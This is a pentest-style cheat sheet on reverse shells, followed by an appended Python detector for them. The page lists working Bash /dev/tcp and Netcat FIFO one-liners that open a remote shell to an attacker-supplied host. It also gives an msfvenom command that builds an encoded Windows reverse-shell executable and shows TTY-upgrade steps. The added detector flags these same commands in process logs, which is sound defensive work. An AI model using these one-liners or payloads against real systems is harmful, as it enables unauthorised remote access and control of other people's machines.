Reverse Shell

One-Liners

Bash

bash -i >& /dev/tcp/<IP>/<port> 0>&1

Netcat

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f
Sometimes one one-liner won't work, but another will. Two great cheatsheets are pentestmonkey and highoncoffee.

Generate Payload

Msfvenom

Windows reverse shell with encoder

msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<Your IP> LPORT=<Listening Port> -f exe -o <Shell Name>.exe

Shell Cushions

If the reverse shell is terminal-based, some measures can be taken to make it more comfortable to use.

Spawn TTY

Python

python -c 'import pty;pty.spawn("/bin/bash")'
Additional ways to spawn TTY.

Auto-Completion

Background the process with Ctrl+z.
Execute this to disable echoing and send I/O straight through without processing.
stty raw -echo
Return to the process with fg, then press Enter twice.
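
Added example, not part of the original page: a small Python detector that flags the Bash and Netcat one-liners and the Python TTY spawn shown above when they appear in process command-line logs. The tab-separated record format, the rule names and the sample records are assumptions constructed for illustration.

```python
import re

# Patterns for the commands on this page. Redirections such as
# ">& /dev/tcp/..." are handled by the invoking shell, so process logs
# contain them only when the whole string is passed as an argument
# (for example to sh -c); pair these rules with network telemetry.
RULES = {
    "bash_dev_tcp": re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+"),
    "fifo_nc_relay": re.compile(
        r"mkfifo\s+([^\s;|&]+).*\b(?:sh|bash)\b.*\|\s*(?:nc|ncat|netcat)\b.*>\s*\1"),
    "python_pty_spawn": re.compile(r"python[\d.]*\s+-c\s.*pty\.spawn\("),
}

def classify(cmdline):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def scan(lines):
    """Parse 'host<TAB>user<TAB>cmdline' records; return (host, user, hits) alerts."""
    alerts = []
    for line in lines:
        parts = line.rstrip("\n").split("\t", 2)
        if len(parts) != 3:
            continue  # skip malformed records
        host, user, cmdline = parts
        hits = classify(cmdline)
        if hits:
            alerts.append((host, user, hits))
    return alerts

# Constructed sample records (192.0.2.0/24 is a documentation range).
SAMPLE = [
    'web01\twww-data\tsh -c bash -i >& /dev/tcp/192.0.2.10/4444 0>&1',
    'web01\twww-data\tsh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f',
    'web01\twww-data\tpython -c import pty;pty.spawn("/bin/bash")',
    'db01\tbackup\tmkfifo /var/run/backup.pipe',   # benign: FIFO without a relay
    'db01\troot\tnc -z 192.0.2.20 5432',           # benign: port check
    'malformed line without tabs',
]

if __name__ == "__main__":
    for host, user, hits in scan(SAMPLE):
        print(f"ALERT host={host} user={user} rules={','.join(hits)}")
```
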
​